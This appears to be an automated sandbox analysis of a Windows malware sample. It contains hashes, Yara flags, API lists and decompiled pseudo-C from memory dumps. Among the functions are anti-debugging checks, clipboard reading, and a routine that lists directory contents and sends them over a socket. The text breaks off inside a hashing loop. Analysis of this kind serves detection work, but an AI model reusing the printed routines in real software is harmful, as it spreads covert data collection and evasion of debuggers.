                    • Opcode Fuzzy Hash: b14c01951aef5a3ce9e700fe29605e893b340df90a5e0dffce6f4a8b69f02f7e
                    • Instruction Fuzzy Hash: 8061C275980207ABFB289F25CD86B7A77A8EF04304F10807BE905C6681E77CDD61CB5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E105C7601(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                    				char _v0;
                    				signed int _v8;
                    				intOrPtr _v524;
                    				intOrPtr _v528;
                    				void* _v532;
                    				intOrPtr _v536;
                    				char _v540;
                    				intOrPtr _v544;
                    				intOrPtr _v548;
                    				intOrPtr _v552;
                    				intOrPtr _v556;
                    				intOrPtr _v560;
                    				intOrPtr _v564;
                    				intOrPtr _v568;
                    				intOrPtr _v572;
                    				intOrPtr _v576;
                    				intOrPtr _v580;
                    				intOrPtr _v584;
                    				char _v724;
                    				intOrPtr _v792;
                    				intOrPtr _v800;
                    				char _v804;
                    				struct _EXCEPTION_POINTERS _v812;
                    				char* _t47;
                    				char* _t49;
                    				intOrPtr _t61;
                    				intOrPtr _t62;
                    				intOrPtr _t66;
                    				intOrPtr _t67;
                    				int _t68;
                    				intOrPtr _t69;
                    				signed int _t70;
                    
                    				_t69 = __esi;
                    				_t67 = __edi;
                    				_t66 = __edx;
                    				_t61 = __ebx;
                    				_t41 =  *0x46a00c ^ _t70;
                    				_v8 =  *0x46a00c ^ _t70;
                    				if(_a4 != 0xffffffff) {
                    					_push(_a4);
                    					E105C0774(_t41);
                    					_pop(_t62);
                    				}
                    				E105C2D6E(_t67,  &_v804, 0, 0x50);
                    				E105C2D6E(_t67,  &_v724, 0, 0x2cc);
                    				_v812.ExceptionRecord =  &_v804;
                    				_t47 =  &_v724;
                    				_v812.ContextRecord = _t47;
                    				_v548 = _t47;
                    				_v552 = _t62;
                    				_v556 = _t66;
                    				_v560 = _t61;
                    				_v564 = _t69;
                    				_v568 = _t67;
                    				_v524 = ss;
                    				_v536 = cs;
                    				_v572 = ds;
                    				_v576 = es;
                    				_v580 = fs;
                    				_v584 = gs;
                    				asm("pushfd");
                    				_pop( *_t22);
                    				_v540 = _v0;
                    				_t49 =  &_v0;
                    				_v528 = _t49;
                    				_v724 = 0x10001;
                    				_v544 =  *((intOrPtr*)(_t49 - 4));
                    				_v804 = _a8;
                    				_v800 = _a12;
                    				_v792 = _v0;
                    				_t68 = IsDebuggerPresent();
                    				SetUnhandledExceptionFilter(0);
                    				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
                    					_push(_a4);
                    					E105C0774(_t57);
                    				}
                    				return E105C0B89(_v8 ^ _t70);
                    			}

                    0x105c7601
                    0x105c7601
                    0x105c7601
                    0x105c7601
                    0x105c7611
                    0x105c7613
                    0x105c761b
                    0x105c761d
                    0x105c7620
                    0x105c7625
                    0x105c7625
                    0x105c7631
                    0x105c7644
                    0x105c7652
                    0x105c7658
                    0x105c765e
                    0x105c7664
                    0x105c766a
                    0x105c7670
                    0x105c7676
                    0x105c767c
                    0x105c7682
                    0x105c7688
                    0x105c768f
                    0x105c7696
                    0x105c769d
                    0x105c76a4
                    0x105c76ab
                    0x105c76b2
                    0x105c76b3
                    0x105c76bc
                    0x105c76c2
                    0x105c76c5
                    0x105c76cb
                    0x105c76d8
                    0x105c76e1
                    0x105c76ea
                    0x105c76f3
                    0x105c7701
                    0x105c7703
                    0x105c7718
                    0x105c7724
                    0x105c7727
                    0x105c772c
                    0x105c773b

                    APIs
                    • IsDebuggerPresent.KERNEL32 ref: 105C76F9
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 105C7703
                    • UnhandledExceptionFilter.KERNEL32(?), ref: 105C7710
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: e8602fbf54147ba671dba98f954c185c9be2e82cbb1f1d55874976700e670ad4
                    • Instruction ID: 3b25ef76af1686d43c4c9feb25753f6d09d3aa0ca95b9e07ee82382003954278
                    • Opcode Fuzzy Hash: e8602fbf54147ba671dba98f954c185c9be2e82cbb1f1d55874976700e670ad4
                    • Instruction Fuzzy Hash: 3331B27490121D9BCB21DF68D989B8CBBB8FF48351F5042EAF41CA6260E7709B818F45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • IsDebuggerPresent.KERNEL32 ref: 0043688B
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00436895
                    • UnhandledExceptionFilter.KERNEL32(?), ref: 004368A2
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: 07253ee0852a9f33764ca5d3af73c4e3b9e3190da062120a25caf8a432b7ba1b
                    • Instruction ID: 5d9ea4708ef0fa84a544dc6c90c967fa764ee4a1b9fa1f4ccea9e64d0f0b82c3
                    • Opcode Fuzzy Hash: 07253ee0852a9f33764ca5d3af73c4e3b9e3190da062120a25caf8a432b7ba1b
                    • Instruction Fuzzy Hash: 5B31D47490122DABCB21DF64DC8978DBBB8BF08351F5041EAE80CA7251EB749F858F49
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E105BF438(HCRYPTPROV* __ecx, BYTE* __edx, int _a4) {
                    				void* _t6;
                    				BYTE* _t9;
                    				long** _t10;
                    
                    				_t10 = __ecx;
                    				_t9 = __edx;
                    				if(CryptAcquireContextA(__ecx, 0, 0, 1, 0xf0000000) != 0) {
                    					if(CryptGenRandom( *_t10, _a4, _t9) != 0) {
                    						CryptReleaseContext( *_t10, 0);
                    						return 0;
                    					}
                    					_push(0xffffff98);
                    					L2:
                    					_pop(_t6);
                    					return _t6;
                    				}
                    				_push(0xffffff99);
                    				goto L2;
                    			}

                    APIs
                    • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000000,00000000,?,105BF0F1,00000034,00000000,00000200,?), ref: 105BF44D
                    • CryptGenRandom.ADVAPI32(00000000,00000200,?,?,105BF0F1,00000034,00000000,00000200,?), ref: 105BF462
                    • CryptReleaseContext.ADVAPI32(00000000,00000000,?,105BF0F1,00000034,00000000,00000200,?), ref: 105BF474
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Crypt$Context$AcquireRandomRelease
                    • String ID:
                    • API String ID: 1815803762-0
                    • Opcode ID: be640132c4cc09921de464d7efa084b83adc683f71156fedcc3855f66cb2cb71
                    • Instruction ID: dbbda19018b8fd617faf48aa4766738e4c8482730b8f096e5100fea56dc92dbd
                    • Opcode Fuzzy Hash: be640132c4cc09921de464d7efa084b83adc683f71156fedcc3855f66cb2cb71
                    • Instruction Fuzzy Hash: ACF06D31208310BAEB302F25AC08F473F5ADB85BE6F614535F348E50E5D6A3A8408798
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • OpenClipboard.USER32(00000000), ref: 00409BDF
                    • GetClipboardData.USER32 ref: 00409BEB
                    • CloseClipboard.USER32(?,00409C74,004092D9,?,00000000,00000000), ref: 00409BF3
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Clipboard$CloseDataOpen
                    • String ID:
                    • API String ID: 2058664381-0
                    • Opcode ID: c9e41d73b8ee8baeafd22f2e569e48e40bbb3502372004424e024307334bc33d
                    • Instruction ID: 8fe6b2826689424b7bc62c1d4e27f3d4ac42e80e4ec2c38984a05695e355c6dc
                    • Opcode Fuzzy Hash: c9e41d73b8ee8baeafd22f2e569e48e40bbb3502372004424e024307334bc33d
                    • Instruction Fuzzy Hash: 88E08631648314BBD610AFA1DC09F9A7B94AB44BD3F050036FD05AA2D2DB74DD00C6AD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E105CD9BC(int _a4) {
                    				void* _t14;
                    				void* _t16;
                    
                    				if(E105D3604(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                    					TerminateProcess(GetCurrentProcess(), _a4);
                    				}
                    				E105CD9FD(_t14, _t16, _a4);
                    				ExitProcess(_a4);
                    			}

                    APIs
                    • GetCurrentProcess.KERNEL32(00000000,?,105CD992,00000000,00468188,0000000C,105CDAA5,00000000,00000002,00000000), ref: 105CD9DD
                    • TerminateProcess.KERNEL32(00000000,?,105CD992,00000000,00468188,0000000C,105CDAA5,00000000,00000002,00000000), ref: 105CD9E4
                    • ExitProcess.KERNEL32 ref: 105CD9F6
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID:
                    • API String ID: 1703294689-0
                    • Opcode ID: 2ecbea2c07618ed559622067c22dc850304ef45ed073450550f7931f31c69ed4
                    • Instruction ID: 8163091343e5a241c91fe6d3d9129da73e9b7d17e508aa8ade7a5b10ec492d37
                    • Opcode Fuzzy Hash: 2ecbea2c07618ed559622067c22dc850304ef45ed073450550f7931f31c69ed4
                    • Instruction Fuzzy Hash: D2E0B639000648ABCF016FA4DE5AA58BF6DFB51283F008068F8098A532CB35EE42CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetCurrentProcess.KERNEL32(00000003,?,0043CB24,00000003,00468188,0000000C,0043CC37,00000003,00000002,00000000,?,0043F98B,00000003), ref: 0043CB6F
                    • TerminateProcess.KERNEL32(00000000,?,0043CB24,00000003,00468188,0000000C,0043CC37,00000003,00000002,00000000,?,0043F98B,00000003), ref: 0043CB76
                    • ExitProcess.KERNEL32 ref: 0043CB88
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID:
                    • API String ID: 1703294689-0
                    • Opcode ID: 2ecbea2c07618ed559622067c22dc850304ef45ed073450550f7931f31c69ed4
                    • Instruction ID: 9d9abcf2254aec220b88c5a41349a832f37ebcac6e9232ae025b4d2f02e95462
                    • Opcode Fuzzy Hash: 2ecbea2c07618ed559622067c22dc850304ef45ed073450550f7931f31c69ed4
                    • Instruction Fuzzy Hash: 56E0B631000748ABCF116F65ED4AA597F69FF59397F045069F9059A232CB39EE42CB48
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: .
                    • API String ID: 0-248832578
                    • Opcode ID: 6555ea729f4bf320215ec20ed3e04cba7ec42d0553a22b02cf13516af4522b1d
                    • Instruction ID: 902a4e4d1e087740e0a32b3358ab9b92e53e313bfb578708a00ec5a0f4c6ba11
                    • Opcode Fuzzy Hash: 6555ea729f4bf320215ec20ed3e04cba7ec42d0553a22b02cf13516af4522b1d
                    • Instruction Fuzzy Hash: CD313771800259AFDB248E79CC84EFBBBBDDF86318F0141AEF818D7251E634AE408B55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 105A8E73
                      • Part of subcall function 105A1915: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 105A1924
                      • Part of subcall function 105A1915: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,105A1B3B,?,00000000), ref: 105A194C
                      • Part of subcall function 105A1915: RegCloseKey.ADVAPI32(00000000,?,?,?,105A1B3B,?,00000000), ref: 105A1957
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: CloseCreateInfoParametersSystemValue
                    • String ID: Control Panel\Desktop
                    • API String ID: 4127273184-27424756
                    • Opcode ID: b0afdbb103ed09d5d1d4a2cadf036e284e3f1dbb9bd7c8f5390a811be432f2d6
                    • Instruction ID: 63a61acb87644f6a84391f730910a34a2db1a8a44e2ee2d105071dbd16ada28d
                    • Opcode Fuzzy Hash: b0afdbb103ed09d5d1d4a2cadf036e284e3f1dbb9bd7c8f5390a811be432f2d6
                    • Instruction Fuzzy Hash: 0A11D632B80350B7E80431790D5BB7F2C19D397B91FA0015AFA012F6C6E9960A9983DB
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0043DD1F,?,00000004), ref: 0044240D
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: InfoLocale
                    • String ID: GetLocaleInfoEx
                    • API String ID: 2299586839-2904428671
                    • Opcode ID: 30b810839b59ba11a6eae0aeef628e107f6b5eb1dc1d371d29b2301ee2a0ab54
                    • Instruction ID: 96fabd543f80631915bdd4e6a3d78e1bd42830cecee988cc8e1c6fddece1edfb
                    • Opcode Fuzzy Hash: 30b810839b59ba11a6eae0aeef628e107f6b5eb1dc1d371d29b2301ee2a0ab54
                    • Instruction Fuzzy Hash: 89F0F631640318BBDB11AF61DC02F6E7F65EF04B02F50402AFC0567292CA799E259A9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cbe7b0f458ff131b15e972950d4c34d3aa2a1aa8db4f332c40bb813be96f2016
                    • Instruction ID: 1c2153c09f84a79ea258590f09f89f50964c174f8247bd10d492af3eb38c561b
                    • Opcode Fuzzy Hash: cbe7b0f458ff131b15e972950d4c34d3aa2a1aa8db4f332c40bb813be96f2016
                    • Instruction Fuzzy Hash: E5022B71E002199FDF14CFA9C9806AEBBF1FF48314F25926AD919E7341D734AE458B84
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?), ref: 0041564B
                    • FindNextFileW.KERNEL32(00000000,?,?), ref: 00415717
                      • Part of subcall function 00407514: char_traits.LIBCPMT ref: 0040752F
                      • Part of subcall function 004179DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,004136FE), ref: 004179F9
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: File$Find$CreateFirstNextchar_traits
                    • String ID:
                    • API String ID: 3100282071-0
                    • Opcode ID: fa562cbc9183c885f9c76a716ca056484cbc588be1d6239d27d27d4f318d7c3c
                    • Instruction ID: fc299df16d418c96fbb3dc7ae8f09247cd9b87a8735511f9070920f35661dee3
                    • Opcode Fuzzy Hash: fa562cbc9183c885f9c76a716ca056484cbc588be1d6239d27d27d4f318d7c3c
                    • Instruction Fuzzy Hash: DB81A6311183409BC314F722C856EEF73A9AF91348F40453FF596671E2EF389A49CA9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E10597031(char _a4) {
                    				char _v28;
                    				char _v52;
                    				char _v76;
                    				struct _WIN32_FIND_DATAW _v668;
                    				void* __ebx;
                    				void* __esi;
                    				int _t29;
                    				void* _t34;
                    				void* _t49;
                    				void* _t73;
                    				void* _t74;
                    
                    				_t73 = FindFirstFileW(E10592D59( &_a4),  &_v668);
                    				_t77 = _t73 - 0xffffffff;
                    				if(_t73 != 0xffffffff) {
                    					E10592F43(_t49,  &_v28);
                    					E105950ED(_t49,  &_v52,  &(_v668.cFileName));
                    					_t71 = 0x45f800;
                    					_t29 = E10598352(__eflags);
                    					_t50 = _t29;
                    					E10592D5E();
                    					__eflags = _t29;
                    					if(__eflags != 0) {
                    						E10592E3F( &_v28, 0x45f800, _t73, E10592F19(_t50,  &_v52, 0x45f800, __eflags,  &_v668, 0x250));
                    						L5:
                    						E10592E35();
                    					}
                    					__eflags = FindNextFileW(_t73,  &_v668);
                    					if(__eflags != 0) {
                    						_t34 = E10592F19(_t50,  &_v76, _t71, __eflags,  &_v668, 0x250);
                    						_t71 =  &_v28;
                    						E10592E3F( &_v28,  &_v28, _t73, E1059835E(_t50,  &_v52,  &_v28, __eflags, _t34));
                    						E10592E35();
                    						goto L5;
                    					}
                    					E10592F5A(_t50, _t74 - 0x18, _t71, __eflags,  &_v28);
                    					_push(0x50);
                    					E10595912(_t50, 0x46c2e8, _t71, __eflags);
                    					E10592E35();
                    				} else {
                    					E105A820A(_t49, _t74 - 0x18,  &_a4);
                    					_push(0x54);
                    					E10595912(_t49, 0x46c2e8,  &_a4, _t77);
                    				}
                    				return E10592D5E();
                    			}

                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?), ref: 1059704C
                    • FindNextFileW.KERNEL32(00000000,?,?), ref: 1059710C
                      • Part of subcall function 10595912: send.WS2_32(?,00000000,00000000,00000000), ref: 10595986
                    Memory Dump Source
                    • Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: FileFind$FirstNextsend
                    • String ID:
                    • API String ID: 4113138495-0
                    • Opcode ID: 9fe72d86b66667744f21832d2d685f530abdb3f2653e1172f6bebf3ad72d57c5
                    • Instruction ID: 6c5faafbfbc6f24ecd2d2bc168af15b285ffdb7e71e1a7053fc6934f1e6de0c5
                    • Opcode Fuzzy Hash: 9fe72d86b66667744f21832d2d685f530abdb3f2653e1172f6bebf3ad72d57c5
                    • Instruction Fuzzy Hash: CA215E39910118AACB04EBA0DC9EDFE7B3CEF95391F40066AB50667190EF307A49CAD0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,?,0046C238), ref: 004061DE
                    • FindNextFileW.KERNEL32(00000000,?,?), ref: 0040629E
                      • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: FileFind$FirstNextsend
                    • String ID:
                    • API String ID: 4113138495-0
                    • Opcode ID: ca6a976084f1de81ffd3886c8e04e897e3e1b7529020c15cd9257a060a587483
                    • Instruction ID: 05b06413529d47d56342622e5ae20bd3e82c8e6dc30fd3fa753989dbabbba416
                    • Opcode Fuzzy Hash: ca6a976084f1de81ffd3886c8e04e897e3e1b7529020c15cd9257a060a587483
                    • Instruction Fuzzy Hash: 442198319102099ACB14FBA6CC96DEF7778AF55304F40017FF906761D2EF385A49CA99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0$>B
                    • API String ID: 0-1048847329
                    • Opcode ID: d377f04f12ce0f7edea2aff32589f2edccf1a6c013219f9a5b1e8afcee6b3214
                    • Instruction ID: 01373311d30a08af49cfafd2a3fc4a279ee9ec8541b77b64949e3053e491237c
                    • Opcode Fuzzy Hash: d377f04f12ce0f7edea2aff32589f2edccf1a6c013219f9a5b1e8afcee6b3214
                    • Instruction Fuzzy Hash: 00127332F002289BDF04DFA6D952AEDB3F2BF88314F65806AD505BB381DA756D419F84
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: @$i2B
                    • API String ID: 0-2200245087
                    • Opcode ID: afc649a906c918a612c1bf2ed60efbe29a77397457307a03108316727d093398
                    • Instruction ID: 4af2ff7e78d49f183de830a94ea395cb586ad7855fff9f1f606cf8d5048b6b54
                    • Opcode Fuzzy Hash: afc649a906c918a612c1bf2ed60efbe29a77397457307a03108316727d093398
                    • Instruction Fuzzy Hash: F941FA76E102199BCB04CFA9D5817DEFBF1FF88310F25815AE905B3350D3B9AA818B94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0044B5A6,?,?,00000008,?,?,0044FE0D,00000000), ref: 0044B7D8
                    Memory Dump Source
                    • Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise
                    • String ID:
                    • API String ID: 3997070919-0
                    • Opcode ID: cc85bae79cd5d03614b0cb5780008f5f07eaef1f5bffa362621243dd81b96db8
                    • Instruction ID: 9f9410494d300a06119f87cf65079ac9d7e92874d2322b7088893299dd62e991
                    • Opcode Fuzzy Hash: cc85bae79cd5d03614b0cb5780008f5f07eaef1f5bffa362621243dd81b96db8
                    • Instruction Fuzzy Hash: E1B16E31510608DFE719CF28C486B657BE0FF45364F29865AE899CF3A1C739E992CB84
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E105BF543(void* __ecx, void* __edx) {
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				signed int _v32;
                    				signed int _v36;
                    				signed int _v40;
                    				signed int _v44;
                    				signed int _v48;
                    				signed int _v52;
                    				signed int _v56;
                    				signed int _v60;
                    				signed int _v64;
                    				signed int _v68;
                    				void _v72;
                    				void* _v76;
                    				void* _v276;
                    				void _v332;
                    				void* _t204;
                    				signed int _t205;
                    				signed int _t206;
                    				signed int _t207;
                    				signed int _t208;
                    				signed int _t209;
                    				signed int _t213;
                    				signed int _t214;
                    				signed int _t215;
                    				signed int _t217;
                    				signed int _t218;
                    				signed int _t219;
                    				signed int _t222;
                    				signed int _t223;
                    				signed int _t224;
                    				signed int _t226;
                    				signed int _t227;
                    				signed int _t228;
                    				signed int _t231;
                    				signed int _t232;
                    				signed int _t233;
                    				signed int _t235;
                    				signed int _t236;
                    				signed int _t237;
                    				signed int _t240;
                    				signed int _t241;
                    				signed int _t242;
                    				signed int _t244;
                    				signed int _t245;
                    				signed int _t246;
                    				signed int _t249;
                    				signed int _t250;
                    				signed int _t251;
                    				signed int _t254;
                    				signed int _t255;
                    				signed int _t256;
                    				signed int _t260;
                    				signed int _t261;
                    				signed int _t262;
                    				signed int _t265;
                    				signed int _t266;
                    				signed int _t267;
                    				signed int _t271;
                    				signed int _t272;
                    				signed int _t273;
                    				signed int _t276;
                    				signed int _t277;
                    				signed int _t278;
                    				signed int _t282;
                    				signed int _t283;
                    				signed int _t284;
                    				signed int _t287;
                    				signed int _t288;
                    				signed int _t289;
                    				signed int _t294;
                    				intOrPtr _t295;
                    				unsigned int _t297;
                    				void* _t299;
                    				signed int _t301;
                    				void* _t400;
                    				void* _t401;
                    				void* _t402;
                    				void* _t403;
                    				void* _t404;
                    				void* _t405;
                    				void* _t406;
                    				void* _t407;
                    				void* _t408;
                    				void* _t409;
                    				void* _t411;
                    				void* _t412;
                    				void* _t413;
                    				void* _t414;
                    				void* _t415;
                    				void* _t422;
                    				void* _t423;
                    				void* _t424;
                    				void* _t425;
                    				void* _t426;
                    				void* _t433;
                    				void* _t434;
                    				void* _t435;
                    				void* _t436;
                    				void* _t437;
                    				void* _t444;
                    				void* _t445;
                    				void* _t446;
                    				void* _t447;
                    				void* _t448;
                    				signed int _t454;
                    				void* _t455;
                    				void* _t456;
                    				void* _t457;
                    				void* _t458;
                    				void* _t459;
                    				signed int _t465;
                    				void* _t466;
                    				void* _t467;
                    				void* _t468;
                    				void* _t469;
                    				void* _t470;
                    				signed int _t476;
                    				void* _t477;
                    				void* _t478;
                    				void* _t479;
                    				void* _t480;
                    				void* _t481;
                    				signed int _t487;
                    				void* _t506;
                    				void* _t513;
                    				void* _t520;
                    				void* _t527;
                    				void* _t534;
                    				void* _t541;
                    				void* _t548;
                    				void* _t555;
                    				unsigned int _t558;
                    				signed int _t563;
                    				signed int _t568;
                    				signed int _t573;
                    				signed int _t578;
                    				signed int _t583;
                    				signed int _t588;
                    				signed int _t593;
                    				signed int _t598;
                    				void* _t603;
                    
                    				_t400 = __edx;
                    				_v12 = 0x30;
                    				_t301 = 8;
                    				_v76 = __ecx;
                    				memcpy( &_v72, __ecx, _t301 << 2);
                    				_push(0x10);
                    				_t204 = memcpy( &_v332, _t400, 0 << 2);
                    				_v40 = _t204;
                    				do {
                    					_t558 =  *_t204;
                    					_t297 =  *(_t204 - 0x34);
                    					_t401 = 0x13;
                    					_t205 = E105BF480(_t558, _t401);
                    					_t402 = 0x11;
                    					_t206 = E105BF480(_t558, _t402);
                    					_t403 = 0x12;
                    					_t207 = E105BF480(_t297, _t403);
                    					_t404 = 7;
                    					_t208 = E105BF480(_t297, _t404);
                    					_t209 = _v40;
                    					 *((intOrPtr*)(_t209 + 8)) = (_t205 ^ _t206 ^ _t558 >> 0x0000000a) + (_t207 ^ _t208 ^ _t297 >> 0x00000003) +  *((intOrPtr*)(_t209 - 0x38)) +  *((intOrPtr*)(_t209 - 0x14));
                    					_t204 = _t209 + 4;
                    					_t14 =  &_v12;
                    					 *_t14 = _v12 - 1;
                    					_v40 = _t204;
                    				} while ( *_t14 != 0);
                    				_v40 = _v40 & 0x00000000;
                    				_t563 = _v44;
                    				_v32 = _v60;
                    				_v20 = _v48;
                    				_v24 = _v64;
                    				_v16 = _v52;
                    				_t212 = _v56;
                    				_v28 = _v68;
                    				_t299 = 2;
                    				_v8 = _v56;
                    				_v36 = _v72;
                    				do {
                    					_t405 = 0x19;
                    					_t213 = E105BF480(_t212, _t405);
                    					_t406 = 0xb;
                    					_t214 = E105BF480(_v8, _t406);
                    					_t407 = 6;
                    					_t215 = E105BF480(_v8, _t407);
                    					_t216 = _v40;
                    					_t42 = _t216 + 0x4655a8; // 0x428a2f98
                    					_t506 = (_t213 ^ _t214 ^ _t215) + ((_v16 ^ _v20) & _v8 ^ _v20) +  *_t42 +  *((intOrPtr*)(_t603 + _v40 - 0x148)) + _t563;
                    					_v32 = _v32 + _t506;
                    					_t408 = 0x16;
                    					_t217 = E105BF480(_v36, _t408);
                    					_t409 = 0xd;
                    					_t218 = E105BF480(_v36, _t409);
                    					_t219 = E105BF480(_v36, _t299);
                    					_t568 = _v32;
                    					_v12 = ((_v28 | _v36) & _v24 | _v28 & _v36) + (_t217 ^ _t218 ^ _t219) + _t506;
                    					_t411 = 0x19;
                    					_t222 = E105BF480(_t568, _t411);
                    					_t412 = 0xb;
                    					_t223 = E105BF480(_t568, _t412);
                    					_t413 = 6;
                    					_t224 = E105BF480(_t568, _t413);
                    					_t225 = _v40;
                    					_t60 = _t225 + 0x4655ac; // 0x71374491
                    					_t513 = (_t222 ^ _t223 ^ _t224) + ((_v16 ^ _v8) & _t568 ^ _v16) +  *_t60 +  *((intOrPtr*)(_t603 + _v40 - 0x144)) + _v20;
                    					_v24 = _v24 + _t513;
                    					_t414 = 0x16;
                    					_t226 = E105BF480(_v12, _t414);
                    					_t415 = 0xd;
                    					_t227 = E105BF480(_v12, _t415);
                    					_t228 = E105BF480(_v12, _t299);
                    					_t573 = _v24;
                    					_v20 = ((_v36 | _v12) & _v28 | _v36 & _v12) + (_t226 ^ _t227 ^ _t228) + _t513;
                    					_t422 = 0x19;
                    					_t231 = E105BF480(_t573, _t422);
                    					_t423 = 0xb;
                    					_t232 = E105BF480(_t573, _t423);
                    					_t424 = 6;
                    					_t233 = E105BF480(_t573, _t424);
                    					_t234 = _v40;
                    					_t79 = _t234 + 0x4655b0; // 0xb5c0fbcf
                    					_t520 = (_t231 ^ _t232 ^ _t233) + ((_v32 ^ _v8) & _t573 ^ _v8) +  *_t79 +  *((intOrPtr*)(_t603 + _v40 - 0x140)) + _v16;
                    					_v28 = _v28 + _t520;
